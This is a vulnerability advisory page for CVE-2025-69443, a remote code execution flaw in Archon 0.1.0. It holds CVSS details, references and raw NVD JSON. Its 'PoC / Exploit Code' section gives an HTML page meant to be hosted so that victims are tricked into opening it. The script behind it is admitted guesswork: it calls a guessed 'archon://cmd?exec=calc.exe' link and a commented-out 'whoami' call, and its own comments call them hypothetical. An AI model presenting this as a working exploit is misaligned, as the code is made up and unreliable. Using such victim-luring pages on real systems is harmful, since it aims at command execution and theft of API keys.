Security Vulnerability Report
CVE-2025-69443 CVSS 6.3 MEDIUM

CVE-2025-69443

Published: 2026-05-14 15:16:44
Last Modified: 2026-05-15 15:16:50

Description

Remote Code Execution in coleam00 Archon 0.1.0. A crafted HTML page, when accessed by a victim, can execute commands, run prompts on behalf of the user, control the Archon UI features, and steal all Archon information available on the UI including API keys.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

coleam00 Archon 0.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  PoC for CVE-2025-69443
  Description: A crafted HTML page that triggers command execution in Archon.
  Usage: Host this file and trick the victim into opening it in a vulnerable environment.
-->
<!DOCTYPE html>
<html>
<head>
  <title>Archon Exploit</title>
</head>
<body>
  <h1>CVE-2025-69443 PoC</h1>
  <script>
    // Attempt to trigger the RCE vulnerability
    // This simulates the malicious payload found in crafted HTML pages
    // The actual payload mechanism depends on Archon's internal implementation
    try {
      // Example trigger (hypothetical)
      window.location.href = "archon://cmd?exec=calc.exe";
      // Alternatively, if there is an exposed API object:
      // if (window.archon) {
      //   window.archon.execute('whoami');
      // }
    } catch (e) {
      console.log("Exploit failed: " + e);
    }
  </script>
</body>
</html>

References

https://github.com/coleam00/Archon
https://www.ox.security/blog/archon-remote-code-execution
https://www.ox.security/blog/cve-2025-69443-archon-os-vulnerable-to-unauthenticated-web-to-client-attack/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-69443",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-14T15:16:44.430",
    "lastModified": "2026-05-15T15:16:50.013",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Remote Code Execution in coleam00 Archon 0.1.0. A crafted HTML page, when accessed by a victim, can execute commands, run prompts on behalf of the user, control the Archon UI features, and steal all Archon information available on the UI including API keys."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-94"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/coleam00/Archon",
        "source": "[email protected]"
      },
      {
        "url": "https://www.ox.security/blog/archon-remote-code-execution",
        "source": "[email protected]"
      },
      {
        "url": "https://www.ox.security/blog/cve-2025-69443-archon-os-vulnerable-to-unauthenticated-web-to-client-attack/",
        "source": "[email protected]"
      }
    ]
  }
}